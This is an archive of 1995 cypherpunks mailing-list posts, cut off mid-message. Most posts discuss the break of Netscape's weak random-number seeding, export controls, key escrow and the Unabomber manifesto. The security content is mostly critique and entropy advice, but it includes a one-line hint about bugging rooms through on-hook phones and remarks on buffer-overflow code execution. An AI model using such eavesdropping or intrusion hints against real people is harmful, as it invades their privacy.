Date: Tue, 19 Sep 95 18:53:47 PDT
To: cypherpunks@toad.com
Subject: Stand up and be heard!
Message-ID: <199509200153.VAA09233@kanga.INS.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


Yes, I'm still working on a magazine, I still need authors! Write
about cryptography and coverups and clipper and whatever else you
find interesting, and write about it!  Become rich and famous! 
(ahtough


although the rich and famous part won't be a result of
writing for TCW...)   I also need reporters to write blurbs about
things that happen.   If interested, mail me privately at 
dr261@cleveland.freenet.edu.. not on the list.

--
Tobin Fricke (aka LightRay)       The Digital Forest BBS (714)586-6142
dr261@kanga.ins.cwru.edu          KE6WHF Amateur Radio, 1:103/925 fido




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Damaged Justice <frogfarm@yakko.cs.wmich.edu>
Date: Tue, 19 Sep 95 19:10:33 PDT
To: libernet-d@dartmouth.edu
Subject: WWW: Unabomber Manifesto
Message-ID: <199509200210.WAA29968@yakko.cs.wmich.edu>
MIME-Version: 1.0
Content-Type: text/plain




The Unabomber Manifesto as published in the September 19th 
Washington Post Special Supplement is available in a slightly
HTML-ized version at

http://yakko.cs.wmich.edu/~frogfarm/unabomb.html

I welcome all comments on both the form and the content of this page.

-- 
http://yakko.cs.wmich.edu/~frogfarm ...for the best in unapproved information
                 To be a skeptic is to refuse to be a victim.
       "This is my .sig. There are many like it, but this one is mine."
                            Freedom...yeah, right.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Tue, 19 Sep 95 19:17:04 PDT
To: owner-cypherpunks@toad.com
Subject: Re: NYT on Netscape Crack
Message-ID: <9509200216.AA17904@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>I take a long term view of security. Basically I don't trust security software 
>until it has been released in a stable condition for a few years.

Really?  So I assume you won't be using an ATM card to buy gasoline until
the next millenium?

>Visa and Mastercard will be comming out with a spec which will have very tight 
>requirements for implementations.

I thought it was Visa and MC and Microsoft are coming out with an
implementation, and then will get around to releasing the specs.
One of V or MC also said that the only approved way to do Internet
commerce with their card was to use this new system.

	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mac Norton <mnorton@cavern.uark.edu>
Date: Tue, 19 Sep 95 20:18:00 PDT
To: Lucky Green <shamrock@netcom.com>
Subject: Re: GAK
In-Reply-To: <199509150055.UAA18048@book.hks.net>
Message-ID: <Pine.SOL.3.91.950919221522.1807D-100000@cavern>
MIME-Version: 1.0
Content-Type: text/plain


As I said, phones are inherently tappable--going
upstream to the switch must makes it easier to do
and harder to detect.  This doesn't force the 
conclusion that, if people speak in code on the
phone, they have to give the gov't the key.

MacN

On Thu, 14 Sep 1995, Lucky Green wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> In article <9509141935.AA09315@argosy.MasPar.COM>, koontz@MasPar.COM
> (David G. Koontz) wrote:
> 
> 
> >While not every telephone, every telephone switch is required
> >to be tap capable  - The Digital Telephony Act.  Note there is
> >provision for the government to pay costs for Telcos to make 
> >their phones tappable - as yet unfunded by Congress.
> 
> Most telephones can be used to monitor conversations in the room they are
> installed in even while on-hook. No need to ever enter the premises. Just
> drive it with AC.  Look at your basic telephone diagram and remember
> Xc=1/(omega*C) from your AC circuits class.
> 
> - -- 
> - -- Lucky Green <mailto:shamrock@netcom.com>
>    PGP encrypted mail preferred.
> - ---
> [This message has been signed by an auto-signing service.  A valid signature
> means only that it has been received at the address corresponding to the
> signature and forwarded.]
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
> Comment: Gratis auto-signing service
> 
> iQBFAwUBMFjO4yoZzwIn1bdtAQFmjwGAwMA+G0nO0m/lmYeqPJEsC5NJNLvS5cYk
> +cMaVSJb+Kwk6+uywu8v088Ih8Nz7uo9
> =elV9
> -----END PGP SIGNATURE-----
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Tue, 19 Sep 95 19:23:09 PDT
To: owner-cypherpunks@toad.com
Subject: Re:  SFChron
Message-ID: <9509200222.AA17923@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>"Mike Homer, vice president of marketing for Netscpae, said that
>recent breaches do not mean the products are flawed"

Of course, it would have been better if the VP of Marketing said that
they had a bug, but that the fundamental architecture is sound.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@Csli.Stanford.EDU>
Date: Tue, 19 Sep 95 22:24:58 PDT
To: hoz@univel.telescan.com (rick hoselton)
Subject: Re: PGP back in legal limbo? [noise]
In-Reply-To: <9509200359.AA07322@toad.com>
Message-ID: <199509200524.WAA20365@Csli.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain



| >Since PKP (and Bidzos, now president of RSA) always said that DH
| >covered all public key encryption, it would seem that any RSA
| >licensee would also need a license from Cylink.
| 
| So, I suppose this invalidates the RSA agreement that allows PGP to 
| be distributed?  What "fortunate" timing for the pro GAK folks! Okay,
| everybody in US, erase your copies, before the Feral government comes 
| to get you.......

Conspiracy flag on.

Did anyone else but me see the discussion organized by Progress &
Freedom Foundation at SPAN, I believe yesterday night. John Barlow
from EFF was there, and he said a few things that certainly got
my attention.

He said that the "borders to cyberspace had to be protected", and
that the "fight for freedom in cyberspace was fought right now, not in
two years, but right now". And that we should "get encryption be
deployed out there, either in Europe [i think he said] or embedded as
a kind of holographic image in the Net". He also said that he
"expected 'blood' to be shed in this fight" (everything taken from 
memory, not exact quotes)

I was surprised at his intensity and outspokeness. I can't get this
kind of statements into agreement with the negative picture several
other cypherpunkers has painted of EFF.

I wonder whether the effort by EFF to put some sensibel input into the 
official loop is failing, and that is behind his statements?
(I haven't seen/heard him make statements earlier, maybe this is his
usual way of expression?)

Does anyone but me smell an attempt of rewinding part of the
widespread use of PGP, because of a "patent problem".

I got the GAO report on "requirements for the information highway",
and they even included a PGP-encrypted email there. The report was 
rather positive to protect the privacy of the users, noting that it
was a fine balance between many interests - not the "law enforcement
only" point of view.

Conspiracy flag off.

/Christian






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 19 Sep 95 22:18:12 PDT
To: cypherpunks@toad.com
Subject: Re: [NOISE] Unabomber - crypto-anarchist?!?
Message-ID: <ac84f1b9250210046a05@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


My almost-namesake Sherry Mayo wrote:

>Found this quote from the Electronic Telegraph, the online version of
>a UK daily newspaper. (world news section, Weds 20th Sept)
>http://www.telegraph.co.uk/et/access?ac=116192744309&pg=//95/9/20/wunab20.html
>
>"Editors forced to print manifesto of Unabomber
>
>By Charles Laurence in New York
>
>...The heart of his argument is that industrial society has led to ways of
>life for which people are fundamentally unsuited. He calls for a
>crypto-anarchic revolution and a new order based on small, village-style
>units."
>^^^^^^^^^^^^^^^
>
>Uh? Crypto-anarchic? Surely he's not one of ours? ;-) ;-) ;-)

I've read a good chunks of FR's work at
http://www.ai.mit.edu/misc/unabomber and have to say he is making some very
interesting and incisive arguments, not all of which I disagree with.

But I also searched the text for mention of "crypto" and only came up with
the fairly standard usage of "crypto leftist." My assumption then is that
the meme of crypto anarchy has spread to the writer at that UK newspaper (I
wonder if Brian Arthur has been talking to them?) and that he interpret's
FR's screed in terms of crypto anarchy?

Still, his writing style and some of his points seem close enough to some
of my own points, not to mention his Northern California nexus and
estimated age, that I'm expecting more inquiries (I deflected one already).

After the call from the Sheriff's office about my alleged activities, I
wonder....

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Tue, 19 Sep 95 19:38:11 PDT
To: owner-cypherpunks@toad.com
Subject: Re: "Hackers"-- brief review and anecdote...
Message-ID: <9509200237.AA17967@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>> If it wasn't for ITAR the Net would already have secure encryption and
>> authentication, and most such hacker attacks would be impossible (or at 
>> least impractical).

>The non-responsive answer is stricken from the record.  :-)
>You mean "secure" as Netscape was secure from sameer et al.?

I don't think it's non-response, I just think you don't understand
yhour expert witness.

If not for the ITAR then I could distribute my secure applications
as a binary library with the security part as source.  When you
got Netscape you'd read the security code or ask local experts to
do so.  You'd verify that the code was correct (or at least not
stupid).  You'd then compile the security code and link it against the
main object module and away you'd go.  If you didn't have a C compiler,
you'd get a binary from someone you trusted.

Of course, all this would be going on in parallel at thousands of sites
around the world.  Everyone looking at the code, finding holes, reporting
them, fixing security bugs, and so on.

But ITAR won't let you do that.

Or netscape would just make calls to the common open multiple-crypto
API that existed in a shared library in your machine.

But apparently the ITAR won't even let you do this.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Van Wie <dvw@hamachi.epr.com>
Date: Tue, 19 Sep 95 21:49:26 PDT
To: "'SMTP:cypherpunks@toad.com>
Subject: Re: Verification of Random Number Generators
Message-ID: <305F9CEC@hamachi>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, 19 Sep 1995 09:04:29 -0700
"Erik E. Fair" wrote:
 --------
>>
>> Just an idle thought: it might be possible to do a probabalistic
>> verification of a RNG by sampling it over some number of samples, and
>> statistically analyzing the sample space. This would be analysis under 
the
>> model of "RNG as black box" as opposed to (or rather, if you're smart, in
>> addition to) code inspection & review. Any statisticians among us?
>>
>> Erik Fair
>>

The problem with a statistic is that it assumes an independent variable.  If 
the variable is not truely independent (which happens with some frequency in 
real world analysis), any purported statistical result is meaningless 
(undefined, to be more precise).  Clearly, the hack of netscape relied on 
the fact that the vairable was not independent.

>But statistical tests of randomness alone do not make a good RNG.
>At least, not for cryptographic use. A cryptographically secure
>RNG is also unpredictable, i.e., computationally unfeasible to
>predict the next random bit will be given the algorithm, and not
>reliably reproduced, i.e., multiple runs with the exact same input
>do not generate the same sequence.

This is almost right.  Statistical tests work fine if they are conducted on 
independent variables.

dvw




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Tue, 19 Sep 95 20:01:34 PDT
To: cypherpunks@toad.com
Subject: http://www.osf.org/~rsalz/unabomber
Message-ID: <9509200301.AA18027@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


Snarfed from MIT.  I'm sure it will soon be all over on many
people's homepages.  I don't know if I want this terrorist to
appreciate the irony or be disgusted.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Tue, 19 Sep 95 20:03:39 PDT
To: cypherpunks@toad.com
Subject: Re: AOL monitoring
Message-ID: <9509200303.AA18042@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>How hard is it to record downloaded newsgroups/msgs from the news

INN, probably the most popular NNTP news system, by default logs
every time the client does a "group" command, typically sent
by the newsreader when you enter a newsgroup.  If you only fetch
articles by messageid then you'll probably avoid anything other than
connection logging.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Deranged Mutant <rrothenb@ic.sunysb.edu>
Date: Tue, 19 Sep 95 20:07:07 PDT
To: cypherpunks@toad.com
Subject: Not Crypto: Referencing Electronic Texts
Message-ID: <199509200306.XAA29101@libws3.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain



This has nothing to do with crypto, but it's a question I'm sure a few
people on the list have had to deal with this as well...

I'm doing a research project for a class on the problems of making
scholarly references to electronic documents, mainly on the how-tos
(for author writing document as well as one who cites an electronic
document in footnotes and bibliographies), as well as some technical
problems (sites change or go down, documents are modified by author
or hacker who doesn't indicate a modification, etc..).

Any information, URLs, references, personal anecdotes, methods, tips,
etc. would be greatly appreciated. (Please reply to me and not the
list unless you find some bizarre way of relating this to crypto...)


Thanks,

Rob



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 19 Sep 95 23:02:05 PDT
To: cypherpunks@toad.com
Subject: Re: NSA and Netscape Crack
Message-ID: <ac84fbf926021004d2c2@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:46 PM 9/19/95, Jim Ray wrote:

>In the relatively short time I've been on this list, Cypherpunks
>have bruted, and then found a weakness in, two kinds of Netscape
>software.
>[A fine public service, IMO. Congrats to all involved.]
>
>I don't expect to know NSA's specific brute-force capability, but
>does anyone know if the NSA has *ever* found a glaring weakness in
>software and then told its author(s) or owner(s) about it? Do "we"
>perform the "COMSEC" role Tim was speaking of better than the NSA?

Indeed, Jim is underscoring the point I was making, facetiously, that the
NSA has abandoned all pretense of helping to actually secure commercial
transactions (and no, I wasn't referring to Clipper...rather, I was
facetiously referring to the short-lived Commercial COMSEC Endorsement
Program, circa 1988-89).

As I said in my message, I don't _want_ the NSA or NIST (the same, really)
to be vetting commercial encryption. But I also don't want them claiming a
role in securing commercial encryption when they clearly are not even doing
as much as the Cypherpunks are doing.

By the way, if we count our own Matt Blaze's work on exposing weaknesses of
the Tessera/Skipjack/Clipper (they blur together) card as a "Cypherpunks
achievement," then the Cypherpunks have actually played a dominant role in
cracking these recent standards. (Not to mention the RC4 code postings, the
various Cypherpunks involved in the RSA-129 and "BlackNet" factorizations,
etc.)

Well done, of course!

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 19 Sep 95 20:26:45 PDT
To: jsw@neon.netscape.com (Jeff Weinstein)
Subject: Re: NYT on Netscape Crack
In-Reply-To: <43lu3k$7q6@tera.mcom.com>
Message-ID: <199509200324.XAA03268@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Jeff Weinstein writes:
> > I suspect that there are far more flaws in Netscape. String buffer
> > overflows are another good guess here -- they are probably rampant
> > through the code both for the browser and the commerce server they
> > sell. I can't prove it myself, of course, given that I don't have the
> > time to rip the thing apart, but the same folks never seemed to learn
> > their lesson in release after release when they worked at NCSA, and
> > the only thing thats probably keeping their dignity here is the lack
> > of distributed source code.
> 
>   Sigh.  For your information the security code for 1.x versions of
> netscape was not even written by someone from NCSA.

If there is ANY place in the code that I can do a data driven buffer
overflow, I can force you to execute code that I supply. I don't give
a damn if it's in the "security" code. It makes no difference where it
is. If there is a chink, thats it -- you're meat.

Besides, the "security code" obviously was written by someone who
doesn't understand anything about cryptography and yet presumed to
play cryptographer. A person who thinks seeding things off the time
makes for a good PRNG is capable of almost anything.

> In the places in the code that I have seen where it looked like such
> errors could have crept in, I have found that the correct checks
> for buffer overflow have been in place.

I have very serious doubts in this regard -- VERY serious doubts,
especially given what I've been told by several former Netscape
employees.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Tue, 19 Sep 95 23:33:17 PDT
To: cypherpunks@toad.com
Subject: Re: netscape broken on NPR
Message-ID: <199509200633.XAA18595@desiree.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:06 PM 9/19/95 -0500, you wrote:
>NPR reported on the security flaw in Netscape,
>
>3:05 pm CDT.	

As well as CNN Headline news.  (With the big Netscape N logo and
everything.)  They spent a fair amount of time (for CNN Headline news) on
the story.

|  Minister of Forced Caffinization in the DNRC   | alano@teleport.com   |
|"The moral PGP Diffie taught Zimmerman unites all| Disclaimer:          |
| mankind free in one-key-steganography-privacy!" | Ignore the man       |
|   -- PGP 2.6.2 key available on request --      |  behind the keyboard.|
|         http://www.teleport.com/~alano          |       <fnord>        |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iagoldbe@csclub.uwaterloo.ca (Ian Goldberg)
Date: Tue, 19 Sep 95 20:34:28 PDT
To: cypherpunks@toad.com
Subject: Re: Encryption algorithms used in PrivaSoft (fwd)
In-Reply-To: <9509191929.AA15153@cs.umass.edu>
Message-ID: <43o23b$91r@calum.csclub.uwaterloo.ca>
MIME-Version: 1.0
Content-Type: text/plain


In article <9509191929.AA15153@cs.umass.edu>,
L. McCarthy <cypherpunks@toad.com> wrote:
>Confirming suspicions that PrivaSoft is a security-through-obscurity outfit:
>
>> From: David Clavadetscher <clav@deltanet.com>
>> Subject: Re: Encryption algorithms used in PrivaSoft
>> 
>> Dear L.,
>> 
>> At this time our crypto engine is patented and proprietary. If you tell me
>> the intent of your interest I will see what other information we can provide
>> to you. Call me if you like.
>[...]

Waitasec...  I was under the impression that if you patented it, you had to
reveal it.  That's why RC4 isn't patented (it used to be a trade secret).

   - Ian "IANAL yadda yadda"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Tue, 19 Sep 95 21:09:15 PDT
To: Rich Salz <rsalz@osf.org>
Subject: Re: "Hackers"-- brief review and anecdote...
In-Reply-To: <9509200237.AA17967@sulphur.osf.org>
Message-ID: <Pine.D-G.3.91.950919233812.7785G-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 19 Sep 1995, Rich Salz wrote:

> >> If it wasn't for ITAR the Net would already have secure encryption and
> >> authentication, and most such hacker attacks would be impossible (or at 
> >> least impractical).
> 
> >The non-responsive answer is stricken from the record.  :-)
> >You mean "secure" as Netscape was secure from sameer et al.?
> 
> I don't think it's non-response, I just think you don't understand
> yhour expert witness.

Difficult to judge a non-responsive answer to a question, when you delete 
the question asked ...

The question was, essentially, what do you think should happen to a 
teenage hacker ...

The "answer" was ... if you did x hacking wouldn't happen.

I guess that means that the domestic version of Netscape can't be broken 
as sameer did.  Oh wait a minute.  Yes it can.  Sloppy work is sloppy 
work.  And it had nothing to do with imposed limits on key length.

Q.  What should you do to a person who robs an liquor store and shoots 
the storekeeper?
A.  If you had gun control, he couldn't have shot him!

Replies in this vein remind me of nothing more than the people who, in 
response to reports of a tragedy in which children die of starvation, 
sickness, or whatever, write letters to the editor which say "thousands 
of children die every year because abortion is legal ..."


And given that the "unexportable" version of Netscape has the same gaping 
hole as the exportable version, your "it's all ITAR's fault" answer is, 
indeed, not responsive.

I even included a smiley for the humor-impaired, but that apparently was 
insufficient.

EBD




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Tue, 19 Sep 95 20:56:36 PDT
To: Steven Levy <steven@echonyc.com>
Subject: Re: "Hackers"-- brief review and anecdote...
Message-ID: <v02130508ac84c085cc65@[166.84.254.3]>
MIME-Version: 1.0
Content-Type: text/plain


At 09:51 9/18/95, Steven Levy wrote:
>No chance. The problem for me isn't that someone wanted to call a movie
>Hackers but that it causes confusion in that for eleven years there has
>been a preexisiting work by that name.  There is a novelization of the
>screenplay now in paperback, so when if a friend recommends that you buy
>Hackers, you'll probably buy that one. (especially since Dell is
>determined to do as little as possible for my own book).

Normally when there can be confusion between a movie title and an existent
book title (in that the movie could be a dramatization of the book based on
general subject matter), the movie gets title clearance, pays a token
release fee to the book's author, and puts up a title clearance credit in
the movie credits. For an example of this, check out Bladerunner (based on
"Do Androids Dream of Electronic Sheep?" not "Bladerunner" [which was by a
different author]) credits where the prior uses of the title were
mentioned.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Tue, 19 Sep 95 21:05:58 PDT
To: perry@piermont.com
Subject: Re: NYT on Netscape Crack
In-Reply-To: <199509200324.XAA03268@frankenstein.piermont.com>
Message-ID: <199509200403.AAA14189@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> > 
> >   Sigh.  For your information the security code for 1.x versions of
> > netscape was not even written by someone from NCSA.
> 
> If there is ANY place in the code that I can do a data driven buffer
> overflow, I can force you to execute code that I supply. I don't give
> a damn if it's in the "security" code. It makes no difference where it
> is. If there is a chink, thats it -- you're meat.

  How would you do this if the buffer overflow happened in a buffer
which was allocated in a separate protected heap apart from stack
and executable data?

-Ray



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Tue, 19 Sep 95 21:06:32 PDT
To: cypherpunks@toad.com
Subject: Commercial RSAref
Message-ID: <199509200406.AAA01221@homeport.org>
MIME-Version: 1.0
Content-Type: text/plain



	First off, let me congratulate you on inking this deal.  I hope that this 
will make a lot of interesting things possible, now that there is an RSAref 
toolkit outside the US, and also for commercial use in the US.

	I have a few questions, which I hope you can answer publically.

	Will there be a public, standard fee schedule?  Many companies would like to 
be able to use RSA technology for a fee, and would like to know what that fee 
is without having to explain their plans in great detail to RSA.  I know 
people who would like to be able to say, heres a check, we're shipping 
software using RSAref to 5000 desktops.

	Will you be adding access points to the software?  I know that PGP required 
new interfaces, previously unpublished, and that use of unpublished interfaces 
was also a problem RSA had with Wei Dai's excellent Crypto++ library. 

Adam

Jonathan Zamick wrote:

| Well I've vaccilated between making a formal, dry announcement or 
| letting you all know my way. Given the general tenor (and individual 
| spirit) of many on Toad it is pretty easy to guess which path I chose.

| So, first of all, here is to a productive future for encryption and 
| encryption technologies. Consensus Development and RSA Data Security, 
| have finalized the contract for Consensus to license and support 
| RSAREF(tm) for commercial use.


| Lastly, we would like to hear suggestions and ideas on how to improve 
| RSAREF. We intend to remain responsive to requests, and welcome ideas 
| for the evolution of the RSAREF toolkit.
"It is seldom that liberty of any kind is lost all at once."
					               -Hume







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iagoldbe@csclub.uwaterloo.ca (Ian Goldberg)
Date: Tue, 19 Sep 95 21:09:35 PDT
To: cypherpunks@toad.com
Subject: My Day
Message-ID: <43o44t$hof@calum.csclub.uwaterloo.ca>
MIME-Version: 1.0
Content-Type: text/plain


Well, my brain's pretty frazzled about now (and I still have a pretty dense
paper on xFS to read and summarize for 9am tomorrow for my OS class) from
all the press that's gone after me today.
The ones I wrote down (I believe sameer wanted a list; I have names and
numbers for some of these, too, bt it was pretty hectic: get off the phone,
go to my terminal, note that I have 20 new mail messages from people wanting
interviews or info, and answer the phone because it's ringing again.):

NY Times
WS Journal
SF Chronicle
CNN (camera crew)
Marketplace (NPR)
SF Examiner
Kansas City Star
Chronicle of Higher Education
Boston Globe
Newsweek (or WiReD; it was Steven Levy)

and at least half a dozen more.  Not to mention the job offers, one call
that I couldn't decipher (it sounded like one of those AI's that you see
roaming the net every so often, only on the phone), and email in French
(je suis canadien, but I was still amazed I could understand it).

Sorry for the blathering, but that's how I feel just now.

BTW: the line we tended to stress was "public availability of source to
at least the security bits", but who knows how it will come out?

Holger.Reif@PrakInf.TU-Ilmenau.DE (Holger Reif ) was kind enough to
verify that the SunOS 4.1.3 version of Netscape generates its keys in
_exactly_ the same way as Solaris and HP-UX; he says he'll test other
architectures tomorrow.  I suspect any big-endian machine with the
lrand48() function (which is used in key generation on Solaris/HP-UX;
it's disguised in unssl.c as the macro mklcpr()) will be the same.
Other Unix flavours should require only minor changes.

I'm still interested in what Windoze clients do (other than lose).

   - Ian "So how _did_ Netscape's stock do today?"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Tue, 19 Sep 95 21:16:26 PDT
To: frogfarm@yakko.cs.wmich.edu
Subject: Re: WWW: Unabomber Manifesto
In-Reply-To: <199509200210.WAA29968@yakko.cs.wmich.edu>
Message-ID: <199509200416.AAA18328@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> 
> 
> The Unabomber Manifesto as published in the September 19th 
> Washington Post Special Supplement is available in a slightly
> HTML-ized version at
> 
> http://yakko.cs.wmich.edu/~frogfarm/unabomb.html


  The Unabomber's whole argument about "industrial-technological
society must continually remove freedoms" and his arguments
about the motives of scientists and technologists, are 
false by existence of modern cryptography and the cypherpunks.
The Unabomber's whole argument rests on his lack of imagination.
Almost all his arguments about large scalee technology were 
counterargued years ago on the Extropian's list. The errors
in his essay are numerous, for instance, he uses as argument,
that medical progress (if that were the only kind of technology)
would be bad in and of itself. As an example, he uses diabetes
which, if treated, allows the diseased to live longer and pass
on their genes. But most forms of diabetes happen at adult
onset longer after the individual would have reproduced anyway.

His arguments against leftists, while partially correct, are poorly
constructed and flawed too. 

All and all, it wasn't worth the 3 deaths and 17 years of bombings
to get tripe like this published. The Unabomber should have found
a ghostwriter friend with a degree in philosophy and got him/her
to write and publish it.

Anyway, the best way to sum up the Unabomber's fantasy world is that
people in the past had high self-esteem, they were simple and happy, and
didn't have to climb the corporate ladder. 

Too bad he didn't read any anthropological studies first.

-Ray
   





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 20 Sep 95 00:09:43 PDT
To: cypherpunks@toad.com
Subject: Re: netscape's response
Message-ID: <ac85072c28021004746c@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:53 AM 9/20/95, Jeff Weinstein wrote:

>  Of course none of this reduces the magnitude of the screw up/bug/design
>flaw/whatever.  I really can't say which of these it was since I wasn't
>around at the time that this code was being written.  I must admit that
>the RNG seed code was not an area that I thought to examine when I took
>over our security library.

In _retrospect_ (:-}), the approach taken by Goldberg and Wagner seems
pretty obvious. Where PGP, for example, asks the user to go through a
laborious process of "generating entropy" through ostensibly-random
keyboard button presses, Netscape does not do this. Nor does it, for
example, "listen" to a microphone input for some amount of time (to at
least make a plausible pretense of gathering entropy), nor does it measure
a Zener diode, or count clicks of a Geiger counter, or whatever.

The very speed of Netscape's PRNG process suggests the usual weakness in
PRNGs: simply not enough entropy. That is, a limited search space allows
the guessing of a seed or entry point in a deterministic process.


>  This was a bad mistake on our part, and we are working hard to fix it.
>We have been trying to identify sources of random bits on PCs, Macs, and
>all of the many unix platforms we support.  We are looking at stuff that
>is system dependent, user dependent, hardware dependent, random external
>sources such as the network and the user.  If anyone has specific
>suggestions I would love to hear them so that we can do a better job.

I think a reasonable way to generate several hundred seemingly random (or
at least highly unpredictable) bits is the "swirling the mouse" approach
mentioned by several people. All implementations of Netscape involve mice,
I assume, and this is a fairly fast way of generating hard-to-guess bits.
Colin Plumb has code to do this, as has been mentioned. (I'm not saying
that some number of "mouse swirlings" will generate some number of bits of
entropy...this depends on the platform, the granularity of mouse
measurements, etc. Better to take several times as many bits as needed and
distill them down, with MD5 or other hash functions....can't have too many
bits of entropy to start with!)

This could be done fairly quickly by Netscape, and doesn't assume the
platform has microphones to "measure background noise" or other exotic and
nonstandard inputs.

Years ago, I recall articles in sci.crypt about getting "pretty good random
numbers" from complicated measurements of disk accesses on a local machine,
ticks of the system clock, times between keyboard button presses, etc., all
mixed and convolved together. Not perfect, of course, but if enough bits
are started with (e.g, 2000) when "only" 126 or 512 or whatever are
ultimately used, this "mixing" can probably be pretty damned good. At
least, I doubt any t-shirts will be won.


>  Do you mean that cypherpunks offered to review the netscape code
>if only we made all the source available on the net?  I think that it
>is unrealistic to expect us to release all of our source code to the
>net.
>
>  We will be having at least some of our code reviewed by a
>wider audience, but I don't yet know which code, or how wide a review
>group.  If anyone has specific suggestions for pieces of code that
>you would like to see widely reviewed (such as RNG and seed generation)
>let me know.
>
>  I realize that some cypherpunks think that we should make all of
>our code publicly available.  In an ideal world that would be great,
>but we live in a world with politicians, crooks, lawyers, stockholders,
>etc...  Don't expect to see us posting our entire security
>library source code to cypherpunks.

I think a better approach is to modularize the functions, so that a "PRNG"
chunk could be shown without "damaging" Netscape's market situation. (I
doubt the crypto section is seen as Netscape's market edge, and use of
industry-verified crypto modules would be a net plus, anyway.)

In other words, keep secret (arguably) the things you don't want
competitors to have access to. But things like crypto modules are rarely
trade secrets--if only because the cores are so often licensed anyway--and
can be shown and vetted without affecting the rest of the product.

(I said "arguably" because many will argue for showing all of the source
code, anyway, as the almost-ultimate check on integrity and reliabilty. And
there may be subtle security flaws that hinge on the overall program, not
just specific parts.)


>  I would love to hear your suggestions for good sources of entropy
>on any systems that our products run on.

See above. This has been a recurring topic in sci.crypt and Cyherpunks---so
recurring, in fact, that several of us have expressed bemusement at seeing
"yet another "How do I generate entropy" argument."

I guess we all (save for Mssrs. Goldberg and Wagner) tacitly assumed that a
modern product claiming to have strong crypto would use commonly-accepted
techniques for generating enough entropy. (Commonly used in RSA's crypto
products, and in PGP.)

I suggest you take RSADSI up on their offer to advise you. (Or Cylink, as
the case may soon be.)

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 20 Sep 95 00:12:42 PDT
To: shields@tembel.org (Michael Shields)
Subject: Re: Investing on Information We Get Here
Message-ID: <ac850e78290210042b29@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:51 AM 9/20/95, Michael Shields wrote:
>> (These computer lists are really great for investors! I heard about the
>> Apple problems a few days before they hit the street, and was able to
